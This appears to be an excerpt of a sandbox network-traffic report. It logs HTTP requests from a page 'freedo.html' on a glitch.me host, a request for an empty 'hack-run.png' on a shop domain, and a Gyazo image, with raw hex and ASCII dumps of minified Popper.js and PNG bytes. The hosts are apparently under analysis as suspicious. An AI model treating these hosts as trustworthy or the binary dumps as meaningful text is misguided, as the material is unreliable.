2022-01-28 16:24:57 UTC	1073	IN	Data Raw: 64 69 66 69 65 72 73 5b 65 5d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 6f 72 64 65 72 2d 74 2e 6f 72 64 65 72 7d 29 2c 74 68 69 73 2e 6d 6f 64 69 66 69 65 72 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 74 2e 6f 6e 4c 6f 61 64 29 26 26 74 2e 6f 6e 4c 6f 61 64 28 6e 2e 72 65 66 65 72 65 6e 63 65 2c 6e 2e 70 6f 70 70 65 72 2c 6e 2e 6f 70 74 69 6f 6e 73 2c 74 2c 6e 2e 73 74 61 74 65 29 7d 29 2c 74 68 69 73 2e 75 70 64 61 74 65 28 29 3b 76 61 72 20 70 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 76 65 6e 74 73 45 6e 61 62 6c 65 64 3b 70 26 26 74 68 69 73 2e 65 6e 61 62 6c 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 74 68 69 73 2e 73 74 Data Ascii: difiers[e])}).sort(function(e,t){return e.order-t.order}),this.modifiers.forEach(function(t){t.enabled&&e(t.onLoad)&&t.onLoad(n.reference,n.popper,n.options,t,n.state)}),this.update();var p=this.options.eventsEnabled;p&&this.enableEventListeners(),this.st
2022-01-28 16:24:57 UTC	1074	IN	Data Raw: 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 70 5b 65 5d 3b 72 65 74 75 72 6e 20 70 5b 65 5d 3c 69 5b 65 5d 26 26 21 74 2e 65 73 63 61 70 65 57 69 74 68 52 65 66 65 72 65 6e 63 65 26 26 28 6f 3d 4a 28 70 5b 65 5d 2c 69 5b 65 5d 29 29 2c 70 65 28 7b 7d 2c 65 2c 6f 29 7d 2c 73 65 63 6f 6e 64 61 72 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 27 72 69 67 68 74 27 3d 3d 3d 65 3f 27 6c 65 66 74 27 3a 27 74 6f 70 27 2c 6e 3d 70 5b 6f 5d 3b 72 65 74 75 72 6e 20 70 5b 65 5d 3e 69 5b 65 5d 26 26 21 74 2e 65 73 63 61 70 65 57 69 74 68 52 65 66 65 72 65 6e 63 65 26 26 28 6e 3d 5f 28 70 5b 6f 5d 2c 69 5b 65 5d 2d 28 27 72 69 67 68 74 27 3d 3d 3d 65 3f 70 2e 77 69 64 74 68 3a 70 2e 68 65 69 67 68 74 29 29 29 2c 70 65 28 7b 7d 2c 6f 2c 6e 29 7d 7d 3b 72 65 74 75 Data Ascii: on(e){var o=p[e];return p[e]<i[e]&&!t.escapeWithReference&&(o=J(p[e],i[e])),pe({},e,o)},secondary:function(e){var o='right'===e?'left':'top',n=p[o];return p[e]>i[e]&&!t.escapeWithReference&&(n=_(p[o],i[e]-('right'===e?p.width:p.height))),pe({},o,n)}};retu
2022-01-28 16:24:57 UTC	1075	IN	Data Raw: 5d 2d 75 29 29 2c 64 5b 6d 5d 2b 75 3e 73 5b 67 5d 26 26 28 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 5b 6d 5d 2b 3d 64 5b 6d 5d 2b 75 2d 73 5b 67 5d 29 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 3b 76 61 72 20 62 3d 64 5b 6d 5d 2b 64 5b 6c 5d 2f 32 2d 75 2f 32 2c 77 3d 74 28 65 2e 69 6e 73 74 61 6e 63 65 2e 70 6f 70 70 65 72 29 2c 79 3d 70 61 72 73 65 46 6c 6f 61 74 28 77 5b 27 6d 61 72 67 69 6e 27 2b 66 5d 2c 31 30 29 2c 45 3d 70 61 72 73 65 46 6c 6f 61 74 28 77 5b 27 62 6f 72 64 65 72 27 2b 66 2b 27 57 69 64 74 68 27 5d 2c 31 30 29 2c 76 3d 62 2d 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 5b 6d 5d 2d 79 2d 45 3b 72 65 74 75 72 6e 20 76 3d 4a 28 5f 28 73 5b 6c 5d 2d 75 2c 76 Data Ascii: ]-u)),d[m]+u>s[g]&&(e.offsets.popper[m]+=d[m]+u-s[g]),e.offsets.popper=c(e.offsets.popper);var b=d[m]+d[l]/2-u/2,w=t(e.instance.popper),y=parseFloat(w['margin'+f],10),E=parseFloat(w['border'+f+'Width'],10),v=b-e.offsets.popper[m]-y-E;return v=J(_(s[l]-u,v
2022-01-28 16:24:57 UTC	1077	IN	Data Raw: 28 6d 7c 7c 62 7c 7c 79 29 26 26 28 65 2e 66 6c 69 70 70 65 64 3d 21 30 2c 28 6d 7c 7c 62 29 26 26 28 69 3d 70 5b 64 2b 31 5d 29 2c 79 26 26 28 72 3d 4b 28 72 29 29 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 3d 69 2b 28 72 3f 27 2d 27 2b 72 3a 27 27 29 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 73 65 28 7b 7d 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 2c 53 28 65 2e 69 6e 73 74 61 6e 63 65 2e 70 6f 70 70 65 72 2c 65 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 29 29 2c 65 3d 43 28 65 2e 69 6e 73 74 61 6e 63 65 2e 6d 6f 64 69 66 69 65 72 73 2c 65 2c 27 66 6c 69 70 27 29 29 7d 29 2c 65 7d 2c 62 65 68 61 76 69 6f 72 3a 27 66 6c 69 70 27 2c 70 61 64 64 69 6e 67 3a 35 2c 62 6f 75 6e 64 61 72 69 65 73 45 Data Ascii: (m\|\|b\|\|y)&&(e.flipped=!0,(m\|\|b)&&(i=p[d+1]),y&&(r=K(r)),e.placement=i+(r?'-'+r:''),e.offsets.popper=se({},e.offsets.popper,S(e.instance.popper,e.offsets.reference,e.placement)),e=C(e.instance.modifiers,e,'flip'))}),e},behavior:'flip',padding:5,boundariesE
2022-01-28 16:24:57 UTC	1078	IN	Data Raw: 28 65 2e 69 6e 73 74 61 6e 63 65 2e 70 6f 70 70 65 72 29 2c 66 3d 67 28 6c 29 2c 6d 3d 7b 70 6f 73 69 74 69 6f 6e 3a 6e 2e 70 6f 73 69 74 69 6f 6e 7d 2c 68 3d 7b 6c 65 66 74 3a 58 28 6e 2e 6c 65 66 74 29 2c 74 6f 70 3a 58 28 6e 2e 74 6f 70 29 2c 62 6f 74 74 6f 6d 3a 58 28 6e 2e 62 6f 74 74 6f 6d 29 2c 72 69 67 68 74 3a 58 28 6e 2e 72 69 67 68 74 29 7d 2c 63 3d 27 62 6f 74 74 6f 6d 27 3d 3d 3d 6f 3f 27 74 6f 70 27 3a 27 62 6f 74 74 6f 6d 27 2c 75 3d 27 72 69 67 68 74 27 3d 3d 3d 69 3f 27 6c 65 66 74 27 3a 27 72 69 67 68 74 27 2c 62 3d 57 28 27 74 72 61 6e 73 66 6f 72 6d 27 29 3b 69 66 28 64 3d 27 62 6f 74 74 6f 6d 27 3d 3d 63 3f 2d 66 2e 68 65 69 67 68 74 2b 68 2e 62 6f 74 74 6f 6d 3a 68 2e 74 6f 70 2c 73 3d 27 72 69 67 68 74 27 3d 3d 75 3f 2d 66 2e 77 69 Data Ascii: (e.instance.popper),f=g(l),m={position:n.position},h={left:X(n.left),top:X(n.top),bottom:X(n.bottom),right:X(n.right)},c='bottom'===o?'top':'bottom',u='right'===i?'left':'right',b=W('transform');if(d='bottom'==c?-f.height+h.bottom:h.top,s='right'==u?-f.wi
2022-01-28 16:24:57 UTC	1079	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2022-01-28 16:24:57 UTC	1128	OUT	GET /css/hover.css HTTP/1.1 Host: magenta-flicker-surprise.glitch.me Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://magenta-flicker-surprise.glitch.me/freedo.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-01-28 16:24:57 UTC	1128	IN	HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2022 16:24:57 GMT Content-Length: 3672 Connection: close Cache-Control: max-age=0
2022-01-28 16:24:57 UTC	1129	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webty

Timestamp	kBytes transferred	Direction	Data
2022-01-28 16:24:57 UTC	1132	OUT	GET /images/sampledata/hack-run.png HTTP/1.1 Host: shopget24.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-01-28 16:24:58 UTC	1133	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/7.2.34 content-type: image/png cache-control: public, max-age=604800 expires: Fri, 04 Feb 2022 16:24:58 GMT content-length: 0 date: Fri, 28 Jan 2022 16:24:58 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close

Timestamp	kBytes transferred	Direction	Data
2022-01-28 16:24:58 UTC	1133	OUT	GET /83cffd1ebf23ed93aa925eb9529f5348.png HTTP/1.1 Host: i.gyazo.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://magenta-flicker-surprise.glitch.me/freedo.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-01-28 16:24:58 UTC	1133	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 16:24:58 GMT Content-Type: image/png Content-Length: 24654 Connection: close CF-Ray: 6d4b92f4fdad5b32-FRA Accept-Ranges: bytes Access-Control-Allow-Origin: https://gyazo.com Age: 1941458 Cache-Control: public, max-age=31536000 ETag: "83cf" Expires: Sat, 28 Jan 2023 16:24:58 GMT Set-Cookie: Gyazo_cfwoker=i; Secure; HttpOnly; SameSite=None; Expires=Tue, 01 Jan 2030 00:00:00 GMT Vary: Accept-Encoding Via: 1.1 google CF-Cache-Status: HIT Access-Control-Allow-Credentials: true Content-Dpr: 1.000000 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Cache-Level: ZS Server: cloudflare
2022-01-28 16:24:58 UTC	1134	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 d0 00 00 07 ac 08 03 00 00 00 d1 06 f9 f1 00 00 01 1a 50 4c 54 45 00 00 00 21 73 45 1e 71 44 1e 77 4a 21 71 44 20 72 45 21 72 45 20 72 45 21 73 46 20 72 45 20 72 45 1f 72 45 20 72 45 1f 72 44 21 75 45 1f 71 45 20 72 45 1e 73 46 20 72 45 1f 71 44 1f 73 45 20 72 45 1f 72 45 20 72 45 20 72 45 21 73 44 1e 71 46 20 71 46 1d 75 45 20 73 45 20 72 45 20 72 45 21 72 44 20 72 45 20 72 45 20 72 45 20 71 45 20 72 45 20 71 45 23 72 48 20 72 45 ff ff ff 88 b4 9c 71 a5 89 a6 c7 b5 6a a1 83 c2 d8 cc 34 7f 56 d6 e5 dd f0 f6 f3 3e 85 5e ae cc bb 79 aa 8f 5b 98 77 97 bd a8 fd fe fe 24 75 48 29 78 4c 21 73 46 fa fc fb f6 f9 f8 2e 7b 51 eb f2 ee 7f ae 94 a0 c3 b0 bc d5 c7 da e8 e0 cc df d5 37 80 58 e2 ed e7 8e b8 a1 46 Data Ascii: PNGIHDRPLTE!sEqDwJ!qD rE!rE rE!sF rE rErE rErD!uEqE rEsF rEqDsE rErE rE rE!sDqF qFuE sE rE rE!rD rE rE rE qE rE qE#rH rEqj4V>^y[w$uH)xL!sF.{Q7XF
2022-01-28 16:24:58 UTC	1135	IN	Data Raw: d8 05 1d 80 82 35 e1 bf 54 11 74 00 42 ab 76 f0 4d d0 01 08 a2 aa 2f 55 7e d8 bb 63 14 04 82 20 88 a2 99 88 c2 82 e9 62 28 e8 fd 4f 28 82 81 a8 c8 ac 51 77 cd 7b 97 f8 b0 cd d4 0a 3a 00 79 0c be 09 3a 00 ad 19 7c 13 74 00 7a 3b 1b 7c 13 74 00 3a 33 f8 26 e8 00 b4 b6 ac 06 df 04 1d 80 c6 0c be 3d 09 3a 00 4d 19 7c 7b 25 e8 00 b4 63 f0 ed 93 a0 03 d0 c8 b2 ee 7c 61 ff 4a d0 01 e8 c1 e0 db 4f 82 0e 40 75 06 df 06 08 3a 00 75 3d be b0 1b 7c 1b 22 e8 00 94 64 f0 6d 1b 41 07 a0 18 83 6f 25 08 3a 00 ff ba 9e f6 c7 cb e1 46 05 82 0e 80 c1 b7 00 82 0e c0 f6 e7 68 be b0 97 23 e8 00 78 8e 16 40 d0 01 18 fa 3b 9a e7 68 b5 09 3a 00 8e e5 01 04 1d 00 db ad 01 04 1d 00 c7 f2 00 82 0e c0 db b1 dc 8f 4e 3b 12 74 00 1c cb 03 08 3a c0 f4 1c cb 13 08 3a c0 c4 1c cb 73 08 3a Data Ascii: 5TtBvM/U~c b(O(Qw{:y:\|tz;\|t:3&=:M\|{%c\|aJO@u:u=\|"dmAo%:Fh#x@;h:N;t::s:
2022-01-28 16:24:58 UTC	1136	IN	Data Raw: 3a 8d e5 7e 12 03 8c 87 a0 c3 6e aa 76 e2 dd 1b 30 3e 77 d3 63 31 8b 63 ba 97 7a 2f d9 b7 f2 a1 49 39 74 57 0c 9d 0f dd 2f 87 16 f3 a1 66 e8 79 f5 89 a6 99 cf 1f 96 57 e7 17 45 51 96 79 7e 9b 65 75 dd f6 5f be 3a fb 4f de bd 01 c0 81 3c 5d 6e 6f 56 cd cb 62 79 7f 51 94 93 7c dd 6e 0e 17 f9 8e 37 f6 ea 04 b5 41 28 0a 00 20 a8 b8 14 97 9f 36 5a ab 21 22 92 f6 fe 37 ec 2d 02 ef 33 73 89 01 80 b7 59 ce ef e1 ab 6b f7 ad 14 3a 00 64 60 99 5f cf b6 2a 46 a1 03 40 7c d7 dc 37 fb 43 e8 00 90 81 8f fb 73 2f 85 0e 00 19 38 a7 76 13 3a 00 64 60 3d ea 3f a1 03 40 7c e9 b3 b9 09 1d 00 32 70 76 85 d0 01 20 03 73 f3 10 3a 00 c4 97 86 7a 14 3a 00 c4 b7 76 a5 d0 01 20 be 6b da 84 0e 00 f1 a5 e1 47 e8 00 90 81 fb 4d e8 00 10 5f ea 0b a1 03 40 7c d7 54 08 1d 00 e2 5b ba 51 Data Ascii: :~nv0>wc1cz/I9tW/fyWEQy~eu_:O<]noVbyQ\|n7A( 6Z!"7-3sYk:d`_*F@\|7Cs/8v:d`=?@\|2pv s:z:v kGM_@\|T[Q
2022-01-28 16:24:58 UTC	1137	IN	Data Raw: 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 81 63 42 a7 43 e8 c0 31 a1 d3 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 81 63 42 a7 43 e8 c0 31 a1 d3 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 81 63 42 a7 43 e8 c0 31 a1 d3 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 c7 5e 1d d4 20 10 04 41 00 b4 c3 f1 00 14 60 80 84 17 fe b5 e0 60 1f 97 5c b2 d3 5d 65 a2 80 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 Data Ascii: 8&t::BNcBC1!t:pLt8&t::BNcBC1!t:pLt8&t::BNcBC1!t:pLt8&t::BN^ A``\]e`B`B`B`B`B`B`B`B`B`B
2022-01-28 16:24:58 UTC	1139	IN	Data Raw: 5f 21 74 00 82 d0 57 08 1d 80 20 f4 15 42 07 20 08 7d 85 d0 01 08 42 5f 21 74 00 82 d0 57 08 1d 80 20 f4 15 42 07 20 08 7d c5 0d 42 7f 17 3a 40 68 42 5f 21 74 00 82 d0 57 08 1d 80 20 f4 15 42 07 78 96 9f c7 a2 ef 2b b5 f6 fb a0 b4 bf eb a5 09 1d 38 d8 d7 05 77 21 74 e0 60 42 e7 3e 84 0e 1c 4c e8 dc 87 d0 f9 67 af 8e 89 00 04 02 20 88 29 a0 43 02 fe 35 62 e2 8b 9f db c4 44 60 98 d0 e9 10 3a 30 4c e8 74 08 1d 18 26 74 3a 84 0e 0c 13 3a 1d 42 07 86 09 9d 8e 13 a1 7f 42 07 ee 24 74 3a 84 0e 0c 13 3a 1d 42 07 86 09 9d 0e a1 03 c3 84 4e 87 d0 81 61 42 a7 43 e8 c0 30 a1 d3 21 74 60 98 d0 e9 10 3a 30 4c e8 74 08 1d 18 26 74 3a 84 0e 0c 13 3a 1d 27 42 7f 85 0e dc 49 e8 74 08 1d 18 26 74 3a 84 0e 0c 13 3a 1d 42 07 86 09 9d 0e a1 03 c3 84 4e 87 d0 81 61 42 a7 43 e8 Data Ascii: _!tW B }B_!tW B }B:@hB_!tW Bx+8w!t`B>Lg )C5bD`:0Lt&t::BB$t::BNaBC0!t`:0Lt&t::'BIt&t::BNaBC
2022-01-28 16:24:58 UTC	1140	IN	Data Raw: 8f a0 23 30 82 de 38 c5 9d dd 95 ab e4 98 e0 ed 81 fe 51 42 7e 04 1d 81 11 f4 c6 29 7e a1 d4 fb 86 96 ce 89 c9 29 64 85 9d 3b 04 1d 71 10 f4 c6 5d ce 4c 93 e3 0d 2d 23 93 d3 9f 26 34 61 d1 f2 68 68 d9 2c 5b d8 9f e0 ed 19 82 ae 45 f1 c6 b4 ef 0d 2d 8a 6b ec 5c ff 82 81 ba 1d 5b 36 fc f4 f3 37 bc 0c 31 13 74 19 8a ef 87 7d 6f 68 11 1c 34 ec 71 40 c7 76 04 dd 0b 82 8e 5d 3e 9a 26 b7 f7 a6 05 ef ac 71 40 c7 1f 10 74 2f 08 3a 76 39 12 fc ec b8 e7 0d 2d 82 77 d6 7a 6e df 76 a0 0e 04 fd 07 7b f7 9a d3 54 18 45 61 78 10 4e 62 6f 85 a8 51 2c 2d 82 5a 84 42 81 00 2a c8 ad f3 9f 06 9c fe a5 fd ce 2e 09 cd 5a e1 7d 86 40 a0 2f 5f cf 65 b9 20 e8 78 c6 61 18 ac b3 15 96 7e a6 9c 8d 00 96 23 e8 2e 08 3a 7a 9d e9 1d 29 e7 ae c2 d1 50 6f 93 76 70 16 c0 72 04 dd 05 41 c7 Data Ascii: #08QB~)~)d;q]L-#&4ahh,[E-k\[671t}oh4q@v]>&q@t/:v9-wznv{TEaxNboQ,-ZB*.Z}@/_e xa~#.:z)PovprA
2022-01-28 16:24:58 UTC	1141	IN	Data Raw: 1e be 25 ce 04 33 4d ec 28 59 3e 87 84 ff 6e 1b f4 06 06 5d 7b c0 1f 9c 32 b8 0e 86 6d b2 70 1e 5d a8 3c 83 0e 65 d0 b5 87 e9 55 e2 7c 85 2c 8b 5b 27 8b 37 e8 ea 65 d0 ab 30 e8 da c7 2a 79 9e 82 80 b6 4b ff 31 a4 4e 06 bd 0a 83 ae 7d cc 68 2b b9 31 c7 a7 5c 24 cb 36 a4 4e 06 fd 2f 7b 77 80 d3 36 10 45 51 74 01 dd c8 1b 40 6a 83 2a 1a 9b 24 54 a0 42 05 34 b4 69 04 aa 68 f6 bf 0d bc 02 a4 cc 8c 3d ef 9b 7b 96 60 25 be 9a c4 df 3f 0a 82 8e 22 b7 c9 ce a5 c3 2d a1 7b 4a 56 bc de 89 8b e0 08 ba 29 82 8e 22 6b c3 15 2d 3b b5 e7 f6 5f 84 c7 ff 10 98 09 82 6e 8a a0 e3 28 f6 3f 2d 0f f6 bd 5a eb f7 c9 ca 63 fb 4b 82 19 21 e8 a6 08 3a ca fc 35 7b 61 b9 c7 03 dd 0f c9 cb 83 80 6c 04 3d 0a 82 8e e3 d8 af 14 1b fc d3 c4 dc bf 57 5f 38 a0 a3 00 41 8f c2 ec c6 43 d0 e3 Data Ascii: %3M(Y>n]{2mp]<eU\|,['7e0yK1N}h+1\$6N/{w6EQt@j$TB4ih={`%?"-{JV)"k-;_n(?-ZcK!:5{al=W_8AC
2022-01-28 16:24:58 UTC	1143	IN	Data Raw: 05 41 87 4b f8 16 55 c7 55 f4 e8 67 dc 0f 05 94 20 e8 ff d8 bb c3 9c 26 02 20 0c c3 37 f1 f7 37 88 41 23 9a 76 69 45 43 21 da d8 ad 18 09 8a de ff 1c 7a 03 59 3a b3 7c 03 ef 73 03 7e c0 9b 59 66 77 ba 78 06 41 7f 41 d0 e7 e1 7e 45 f5 4a e9 16 46 0f 21 18 d0 51 85 a0 77 41 d0 91 c6 fc 8a 6a c2 ab e8 ce 9b fc 2f 05 d4 20 e8 5d 10 74 d4 d9 38 7d 74 25 e1 70 89 f3 e7 f0 2e 17 02 6a 10 f4 2e 08 3a f2 98 5f 51 7d ab 64 bf c3 c7 ad 80 22 04 bd 0b 82 8e 3c e6 57 54 57 6b e5 3a 0e 1b 5b 06 74 94 21 e8 5d 10 74 24 32 bf a2 7a ab 54 cb 7d d8 38 15 50 85 a0 77 41 d0 51 e9 4b 38 b9 d0 21 9c bf 9c c3 80 8e 42 04 bd 0b 82 8e 4c ce 6b 63 ff ec 94 c9 e8 fc cc b9 80 32 04 bd 0b 82 8e 4c d6 df 3a 8f 18 95 e8 2e 6c 7c 58 0a 28 43 d0 bb 20 e8 28 35 bc 0e 23 a9 4f a6 6f c2 06 Data Ascii: AKUUg & 77A#viEC!zY:\|s~YfwxAA~EJF!QwAj/ ]t8}t%p.j.:_Q}d"<WTWk:[t!]t$2zT}8PwAQK8!BLkc2L:.l\|X(C (5#Oo
2022-01-28 16:24:58 UTC	1144	IN	Data Raw: 76 08 3a ea 20 e8 be 34 0e 76 67 ee be 95 67 65 40 77 44 d0 51 07 41 f7 75 9a 1a 3e c4 32 d1 43 e8 0c e8 8e 08 3a ea 20 e8 c6 fe a4 84 2f 1f 63 89 e6 c5 76 c7 0c e8 8e 08 3a ea 20 e8 c6 3e a7 86 49 2c d1 fc e8 b1 17 30 44 d0 51 07 41 77 a6 71 59 cb e6 05 66 17 0a bf df 63 40 f7 44 d0 51 07 41 77 76 9d 12 0e 4e e2 25 c9 7b 6a af 03 8e 08 3a ea 20 e8 ce 86 97 29 61 12 eb 29 2c 7b bd 1c 06 1c 11 74 d4 41 d0 ad 69 6c 3c c9 69 ac 75 95 02 76 03 96 08 3a ea 20 e8 d6 46 12 17 b0 e5 c1 45 3c 23 79 ed eb 77 06 74 53 04 1d 75 10 74 6f b3 94 b0 88 35 0e 15 76 b7 ff 0d 78 22 e8 a8 83 a0 7b 1b 9f a7 82 69 3c 91 3c 5d c7 80 6e 8b a0 a3 8e d7 08 fa 3b 82 ae 4b e1 75 f6 86 77 ee ff b2 7f 0c e8 b6 08 3a ea 20 e8 e6 4e 24 2e 55 cd 45 74 1a 09 bc 44 60 40 f7 45 d0 51 07 41 Data Ascii: v: 4vgge@wDQAu>2C: /cv: >I,0DQAwqYfc@DQAwvN%{j: )a),{tAil<iuv: FE<#ywtSuto5vx"{i<<]n;Kuw: N$.UEtD`@EQA
2022-01-28 16:24:58 UTC	1145	IN	Data Raw: ae df 35 84 81 4e 2b 82 1e 4a d0 c9 75 5f 33 ec 2f e8 44 d0 43 09 3a b9 a6 dc 7f 3d 5b d0 89 a0 87 12 74 82 fd ac 09 0c 74 9a 11 f4 50 82 4e b0 af 23 ee bf 1a e8 34 23 e8 a1 04 9d 64 13 ee bf 1a e8 74 23 e8 a1 04 9d 64 07 03 ee bf 1a e8 74 23 e8 a1 04 9d 68 1f 6a eb 0c 74 da 11 f4 50 82 4e b4 ff 9b bf ff 6a a0 d3 8e a0 87 12 74 b2 9d d6 b6 dd 2c e8 46 d0 43 09 3a d9 ce 6a db 6e 17 74 23 e8 a1 04 9d 70 db be ff 6a a0 d3 90 a0 87 12 74 c2 ed d5 96 19 e8 34 24 e8 a1 04 9d 70 0f ec dc 51 2a 2d 60 18 85 e1 eb 33 93 ff 3f 52 28 b5 29 12 71 c1 e6 4a 91 98 ff 34 4c 63 ad cf f3 4c e2 6d dd ac c3 e3 9e eb 61 41 1f 41 0f 25 e8 a4 9b fc ff 6a a0 d3 48 d0 43 09 3a e9 ae ce f7 54 06 3a 95 04 3d 94 a0 13 ef 6d 4f 75 b9 a0 90 a0 87 12 74 e2 8d fd 7f 35 d0 e9 24 e8 a1 04 Data Ascii: 5N+Ju_3/DC:=[ttPN#4#dt#dt#hjtPNjt,FC:jnt#pjt4$pQ*-`3?R()qJ4LcLmaAA%jHC:T:=mOut5$
2022-01-28 16:24:58 UTC	1147	IN	Data Raw: 68 7e 52 5f 63 67 41 24 41 6f aa f9 35 29 e8 3c fa 5d f3 6c 0e 17 24 12 f4 a6 04 9d 08 3f 6a 20 13 9d 4c 82 de 94 a0 93 e0 6f 4d f4 c5 44 e7 81 fd 3a 4d 8d 02 0a a2 30 ba 13 7f bf 42 82 11 22 76 da 91 c4 b1 e3 18 e3 04 71 ff db 70 1b b7 5e 9d b3 86 a2 3e 6e 4b 82 1e 4a d0 69 e0 78 5e 5b ba 5d d0 90 a0 87 12 74 1a b8 af 3d 99 e8 b4 24 e8 a1 04 9d 7c 87 bb da 94 89 4e 47 82 1e 4a d0 c9 77 51 bb 32 d1 e9 48 d0 43 09 3a f1 2e 4f b5 ad 57 0b da 11 f4 50 82 4e bc db da d7 c9 44 a7 1f 41 0f 25 e8 a4 bb 7c 59 1b 33 d1 e9 47 d0 43 09 3a e9 de d5 ce 4e 87 05 cd 08 7a 28 41 27 dc 8b c7 b5 b5 8b 05 cd 08 7a 28 41 27 dc 97 da 9b 89 4e 3b 82 1e 4a d0 c9 f6 e8 6b 6d ce 44 a7 1b 41 0f 25 e8 64 fb 5e bb 7b 6b a2 d3 8c a0 87 12 74 a2 bd 79 5e db fb bd a0 15 41 0f 25 e8 44 Data Ascii: h~R_cgA$Ao5)<]l$?j LoMD:M0B"vqp^>nKJix^[]t=$\|NGJwQ2HC:.OWPNDA%\|Y3GC:Nz(A'z(A'N;JkmDA%d^{kty^A%D
